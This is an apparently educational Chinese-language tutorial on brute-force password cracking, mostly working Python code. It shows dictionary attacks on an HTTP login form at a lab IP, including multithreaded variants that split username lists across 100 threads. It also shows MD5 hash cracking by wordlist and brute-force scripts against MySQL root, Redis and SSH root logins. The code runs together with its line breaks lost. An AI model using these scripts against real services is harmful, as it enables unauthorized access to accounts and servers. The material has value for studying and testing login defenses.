暴力破解案例
暴力破解
1 概述
暴力破解,是一种针对密码的破译方法,将密码进行逐个推算直到找出真正的密码为止。
2 爆破HTTP协议
第一步:实验性发送请求成功
import requests
url = "http://192.172.0.100:8080/woniusales/user/login"data = {"username":"admin","password":"123456","verifycode":"0000"}result = requests.post(url=url,data=data)if result.text != "login-fail":print(f"疑是破解成功,密码是:{password}")
第二步:已知用户名,未知密码破解
import requestsdef pojie_http(password):url = "http://192.172.0.100:8080/woniusales/user/login"data = {"username":admin,"password":password,"verifycode":"0000"}result = requests.post(url=url,data=data)if result.text != "login-fail":print(f"疑是破解成功,密码是:{password}")exit()
with open(file="password.txt") as f:passwordlist = f.readlines()
for passwd in passwordlist:passwd = passwd.strip()pojie_http(passwd)
第三步:未知用户名密码破解import requestsdef pojie_http(username,password):url = "http://192.172.0.100:8080/woniusales/user/login"data = {"username":username,"password":password,"verifycode":"0000"}result = requests.post(url=url,data=data)if result.text != "login-fail":print(f"疑是破解成功,密码是:{password}")exit()with open(file="password.txt") as f:passwordlist = f.readlines()with open(file="username.txt") as f:usernamelist = f.readlines()for user in usernamelist:user = user.strip()for passwd in passwordlist:passwd = passwd.strip()pojie_http(user,passwd)
注意:
1.暴力破解不是100%能破解成功,取决于你是否有强大的字典
2.并不是所有的http协议可以暴力破解
2.1 简单的验证码
2.2 没有错误次数的验证
2.3 明文显示,未经过加密
3 多线程破解
一个用户作为一个线程爆破
for user in usernamelist:obj = threading.Thread(target=pojie_http,args=(user,))obj.start()
# 1.受到本机的性能影响,最大1300线程
# 2.受到服务器性能影响,最大吞吐量
4 多线程分配任务破解
import threadingimport requestsdef pojie_http(startindex,endindex):url = "http://192.172.0.100:8080/woniusales/user/login"for user in usernamelist[startindex:endindex]:user = user.strip()for passwd in passwordlist:passwd = passwd.strip()data = {"username":user,"password":passwd,"verifycode":"0000"}result = requests.post(url=url,data=data)if result.text != "login-fail":print(f"疑是破解成功,用户名是{user},密码是:{passwd}")exit()if __name__ == '__main__':with open(file="username.txt") as f:usernamelist = f.readlines()with open(file="password.txt") as f:passwordlist = f.readlines()# 分任务爆破,启动100个线程,每个线程跑20个用户,每个用户跑所有的密码,根据服务器动态调整线程个数for index in range(100):start = 20 * indexend = 20 * (index + 1)obj = threading.Thread(target=pojie_http,args=(start,end)) # 0-10 10-20 20-30 30-40 ...190-200obj.start()
5 MD5爆破
MD5无法逆推解密,只能通过穷举法反向查询import hashlibdef pojie_md5(source,target):h_md5 = hashlib.md5(source.encode()).hexdigest()print(h_md5)if h_md5 == target:print(f"怀疑是破解成功:{source}")exit()if __name__ == '__main__':target = "e10adc3949ba59abbe56e057f20f883e"with open(file="password.txt") as f:data_list = f.readlines()for i in data_list:i = i.strip()pojie_md5(source=i,target=target)
6 MySQL爆破
import pymysqldef pojie_mysql(passwd):try:conn = pymysql.connect(user="root",password=passwd,port=3306,host="192.172.0.100")except:pass# 连接成功什么都没有 连接失败报错else:print(f"疑是破解成功:{passwd}")exit()if __name__ == '__main__':with open(file="password.txt") as f:data_list = f.readlines()for passwd in data_list:pojie_mysql(passwd.strip())
7 Redis爆破
import redis
def pojie_redis(passwd):try:redis_obj = redis.Redis(host="192.172.0.101",password=passwd,db=0)redis_obj.ping()except:passelse:print(f"密码是{passwd}")exit()
if __name__ == '__main__':with open(file="password.txt") as f:data_list = f.readlines()for passwd in data_list:pojie_redis(passwd.strip())
8 SSH爆破
import paramiko
from paramiko.client import AutoAddPolicy
def pojie_ssh(passwd):try:ssh = paramiko.SSHClient()ssh.set_missing_host_key_policy(AutoAddPolicy)ssh.connect(hostname="192.172.0.100",username="root",password=passwd)except:passelse:print(f"密码是{passwd}")exit()if __name__ == '__main__':with open(file="password.txt") as f:data_list = f.readlines()for passwd in data_list:pojie_ssh(passwd.strip())
9 爆破工具
https://blog.csdn.net/m0_59598029/article/details/133217000
https://blog.51cto.com/u_16213303/10539031
https://www.zhihu.com/tardis/bd/art/558677293?source_id=1001
